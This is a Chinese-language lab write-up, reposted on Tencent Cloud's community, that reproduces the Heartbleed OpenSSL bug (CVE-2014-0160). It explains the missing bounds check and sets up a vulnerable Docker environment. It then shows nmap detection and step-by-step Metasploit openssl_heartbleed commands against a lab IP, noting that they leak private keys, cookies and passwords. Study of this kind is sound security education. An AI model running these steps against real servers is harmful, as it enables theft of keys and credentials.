前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2014-0160:心脏出血(心血)漏洞

CVE-2014-0160:心脏出血(心血)漏洞

作者头像
全栈程序员站长
发布2022-09-09 11:02:57
9400
发布2022-09-09 11:02:57
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

0x00 漏洞介绍

是一个出现在加密程序库OpenSSL的安全漏洞,该程序错误属于缓冲区过读,即可以读取的数据比应该允许读取的还多

0x01 漏洞成因

由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露

0x02 影响范围

OpenSSL1.0.1版本

0x03 环境搭建

使用docker一键搭建环境

代码语言:javascript
复制
docker-compose build
docker-compose up -d
docker-compose ps

环境搭建完成后,访问http://192.168.220.134,测试环境是否搭建成功 http://192.168.220.134/

0x04 漏洞复现

使用nmap检测“心脏出血”漏洞是否存在,指定端口号为443

代码语言:javascript
复制
nmap -sV -p 443 --script ssl-heartbleed.nse 192.168.220.134

使用msf对漏洞进行利用,查找heartbleed模块

代码语言:javascript
复制
msf5 > search heartbleed

使用第一个选项,设置主机IP地址、端口号,设置verbosetrue以便于显示泄露的信息

代码语言:javascript
复制
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed 
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 192.168.220.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RPOST 443
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true 
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

漏洞利用成功后可以抓取到信息,包括服务器的私钥、用户的cookie、密码等

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/160530.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 漏洞介绍
  • 0x01 漏洞成因
  • 0x02 影响范围
  • 0x03 环境搭建
  • 0x04 漏洞复现
相关产品与服务
SSL 证书
腾讯云 SSL 证书(SSL Certificates)为您提供 SSL 证书的申请、管理、部署等服务,为您提供一站式 HTTPS 解决方案。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档